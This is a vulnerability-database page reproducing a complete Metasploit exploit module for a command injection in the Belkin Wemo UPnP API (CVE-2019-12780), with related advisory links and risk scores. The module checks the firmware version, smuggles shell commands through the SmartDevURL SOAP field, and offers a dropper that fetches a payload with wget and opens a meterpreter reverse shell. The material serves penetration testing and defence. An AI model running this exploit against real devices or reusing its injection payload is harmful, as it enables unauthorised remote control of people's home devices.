Lucene search
+L

Belkin Wemo UPnP Remote Code Execution

🗓️ 04 Apr 2014 00:00:00Reported by phikshun, wvu <[email protected]>, nstarkeType 
metasploit
 metasploit
🔗 www.rapid7.com👁 60 Views

Belkin Wemo UPnP Remote Code Execution. Exploits command injection in Belkin Wemo UPnP API via SmartDevURL argument to SetSmartDevInfo action. Tested on Wemo-enabled Crock-Pot with other Wemo devices also affected on a different RPORT. Patched in 2.00.8643 without vendor disclosure

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2019-12780
19 Feb 201919:55
circl
checkpoint_advisories
Check Point Advisories
Belkin Wemo UPnP API OS Command Injection (CVE-2019-12780)
28 Nov 202200:00
checkpoint_advisories
cve
CVE
CVE-2019-12780
10 Jun 201915:46
cve
cvelist
Cvelist
CVE-2019-12780
10 Jun 201915:46
cvelist
nvd
NVD
CVE-2019-12780
10 Jun 201916:29
nvd
prion
Prion
Command injection
10 Jun 201916:29
prion
redhatcve
RedhatCVE
CVE-2019-12780
7 Jan 202609:28
redhatcve
vulncheck_kev
VulnCheck KEV
VulnCheck KEV: CVE-2019-12780
13 Jun 201900:00
vulncheck_kev
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Belkin Wemo UPnP Remote Code Execution',
        'Description' => %q{
          This module exploits a command injection in the Belkin Wemo UPnP API via
          the SmartDevURL argument to the SetSmartDevInfo action.

          This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
          devices are known to be affected, albeit on a different RPORT (49153).
        },
        'Author' => [
          'phikshun', # Discovery, UFuzz, and modules
          'wvu',      # Crock-Pot testing and module
          'nstarke'   # Version-checking research and implementation
        ],
        'References' => [
          ['CVE', '2019-12780'],
          ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
          ['URL', 'https://github.com/phikshun/ufuzz'],
          ['URL', 'https://gist.github.com/phikshun/10900566'],
          ['URL', 'https://gist.github.com/phikshun/9984624'],
          ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
          ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
          ['URL', 'http://www.wemo.com/']
        ],
        'DisclosureDate' => '2014-04-04',
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'Targets' => [
          [
            'Unix In-Memory',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/generic'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_MIPSLE,
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'Notes' => {
          'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(49152)
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  def check
    checkcode = CheckCode::Unknown('Wemo-enabled device not yet detected')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/setup.xml'
    )

    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
      vprint_error('Wemo-enabled device not detected')
      return checkcode
    end

    vprint_good('Wemo-enabled device detected')
    checkcode = CheckCode::Detected('Wemo-enabled device detected via /setup.xml')

    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1))

    unless version
      vprint_error('Could not determine firmware version')
      return checkcode
    end

    vprint_status("Found firmware version: #{version}")

    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
    if version < Rex::Version.new('2.00.8643')
      vprint_good("Firmware version #{version} < 2.00.8643")
      checkcode = CheckCode::Appears("Belkin Wemo firmware version #{version} is below the patched version 2.00.8643")
    else
      vprint_error("Firmware version #{version} >= 2.00.8643")
      checkcode = CheckCode::Safe("Belkin Wemo firmware version #{version} is >= 2.00.8643 and is patched")
    end

    checkcode
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      cmdstager = generate_cmdstager(
        flavor: :wget,
        temp: datastore['WritableDir'],
        file: File.basename(cmdstager_path),
        noconcat: true
      )

      # HACK: "chmod +x"
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
      cmdstager = cmdstager.join(';')

      vprint_status("Regenerated command stager: #{cmdstager}")
      execute_command(cmdstager)
    end
  end

  def execute_command(cmd, _opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/upnp/control/basicevent1',
      'ctype' => 'text/xml',
      'headers' => {
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
      },
      'data' => generate_soap_xml(cmd)
    )
  end

  def generate_soap_xml(cmd)
    <<~EOF
      <?xml version="1.0" encoding="utf-8"?>
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <s:Body>
          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
          </u:SetSmartDevInfo>
        </s:Body>
      </s:Envelope>
    EOF
  end

  def cmdstager_path
    @cmdstager_path ||=
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2014 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 39.8
EPSS0.59616
60